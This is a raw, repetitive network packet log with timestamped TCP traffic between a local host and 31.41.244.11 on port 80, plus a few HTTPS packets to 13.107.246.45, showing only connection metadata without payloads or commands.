                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.427833080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.427886009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.428818941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.428869963 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.428936005 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.428988934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.429934025 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.430003881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.430027008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.430077076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.431006908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.431060076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.431070089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.431104898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.432130098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.432183027 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.432288885 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.432336092 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.433202982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.433262110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.433324099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.433372021 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.434252977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.434339046 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.434375048 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.434425116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.435376883 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.435424089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.435451984 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.435513020 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.436441898 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.436502934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.436570883 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.436615944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.437530041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.437577009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.437643051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.437686920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.438621998 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.438673019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.438740015 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.438790083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.439714909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.439764023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.439822912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.439870119 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.440781116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.440833092 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.440964937 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.441020966 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.441881895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.441936016 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.441946030 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.441981077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.443005085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.443042994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.443124056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.443176031 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.444077015 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.444135904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.444188118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.444237947 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.445167065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.445221901 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.445276976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.445323944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.446239948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.446285963 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.446366072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.446413040 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.447355986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.447402000 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.447455883 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.447571039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.448427916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.448484898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.448527098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.448574066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.449501991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.449620962 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.449639082 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.449691057 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.450601101 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.450649977 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.450742006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.450797081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.451687098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.451730967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.451792955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.451838017 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.452781916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.452830076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.452888966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.452936888 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.453856945 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.453901052 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.453963995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.454015017 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.454951048 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.455007076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.455086946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.455142975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.456039906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.456091881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.456149101 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.456192970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.457127094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.457192898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.457261086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.457356930 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.458216906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.458268881 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.458268881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.458318949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.459373951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.459425926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.459430933 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.459471941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.460395098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.460441113 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.460520029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.460580111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.461513042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.461575985 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.461637020 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.461689949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.462609053 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.462657928 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.462738037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.462804079 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.463670015 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.463716984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.463781118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.463828087 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.464750051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.464797974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.464916945 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.464962006 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.465859890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.465910912 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.465913057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.465960979 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.466934919 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.466989994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.467056990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.467102051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.468014956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.468128920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.468144894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.468189955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.469120979 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.469177961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.469242096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.469291925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.470205069 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.470259905 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.470293045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.470344067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.471282005 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.471328974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.471415997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.471467018 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.472381115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.472440004 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.472495079 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.472543955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.473462105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.473511934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.473577023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.473628044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.474529028 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.474587917 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.474653006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.474699974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.475642920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.475698948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.475755930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.475802898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.476727962 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.476782084 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.476787090 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.476829052 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.477818012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.477869987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.477871895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.478240013 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.479012012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.479074955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.479356050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.479418039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.480036020 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.480097055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.480174065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.480222940 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.481060982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.481111050 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.634340048 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.634399891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.634458065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.634490013 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.634919882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.634974957 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.635014057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.635065079 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.635971069 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.636023045 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.636079073 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.636127949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.637059927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.637119055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.637176037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.637233019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.638395071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.638457060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.638580084 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.638639927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.639235020 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.639302015 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.639303923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.639358044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.640330076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.640403032 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.640455961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.640505075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.641388893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.641449928 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.641532898 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.641582012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.642565966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.642625093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.642676115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.642726898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.643614054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.643672943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.643737078 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.643785954 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.644658089 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.644720078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.644788027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.644836903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.645776033 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.645833015 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.645853043 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.645903111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.646837950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.646897078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.646965981 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.647049904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.647938967 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.647994041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.648008108 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.648051023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.107448101 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.118320942 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.163634062 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.163638115 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.175611019 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.180633068 CET4434978713.107.246.45192.168.2.4
